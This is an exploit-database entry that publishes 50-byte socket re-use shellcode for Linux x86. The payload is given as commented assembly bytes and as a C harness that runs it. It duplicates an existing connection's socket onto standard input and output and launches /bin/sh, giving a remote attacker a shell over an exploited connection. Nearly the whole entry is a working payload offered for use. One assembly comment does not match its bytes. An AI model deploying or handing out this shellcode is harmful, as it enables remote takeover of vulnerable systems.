Socket Re-use Shellcode for Linux x86 (50 bytes)
| EKU-ID: 4167 | CVE: | OSVDB-ID: |
| Author: ZadYree | Published: 2014-07-23 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4167 | CVE: | OSVDB-ID: |
| Author: ZadYree | Published: 2014-07-23 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes * <zadyree@tuxfamily.org> * * Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) + * execve /bin/sh * * Thanks: Charles Stevenson, ipv, 3LRVS research team * * gcc -o socket_reuse socket_reuse.c -z execstack */ char shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */"\x6a\x02" // push 0x2 "\x5b" // pop ebx "\x6a\x29" // push 0x29 "\x58" // pop eax "\xcd\x80" // int 0x80 -> call dup(2) "\x48" // dec eax /* Now EAX = our Socket File Descriptor */ "\x89\xc6" // mov esi, eax /* dup2(fd,0); dup2(fd,1); dup2(fd,2); */"\x31\xc9" // xor %ecx,%ecx "\x56" // push %esi "\x5b" // pop %ebx // loop: "\x6a\x3f" // push $0x3f "\x58" // pop %eax "\xcd\x80" // int $0x80 "\x41" // inc %ecx "\x80\xf9\x03" // cmp $0x3,%cl "\x75\xf5" // jne 80483e8 <loop> /* execve /bin/sh by ipv */"\x6a\x0b" // push byte 0xb "\x58" // pop eax "\x99" // cdq "\x52" // push edx "\x31\xf6" // xor esi, esi - We add those instructions "\x56" // push esi - to clean up the arg stack "\x68\x2f\x2f\x73\x68" // push dword 0x68732f2f "\x68\x2f\x62\x69\x6e" // push dword 0x6e69922f "\x89\xe3" // mov ebx, esp "\x31\xc9" // xor ecx, ecx "\xcd\x80"; // int 0x80 ; /* shellcode[]= "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6" "\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80" "\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6" "\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" "\x89\xe3\x31\xc9\xcd\x80"; */ int main(void) { printf("Shellcode length: %d\n", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; }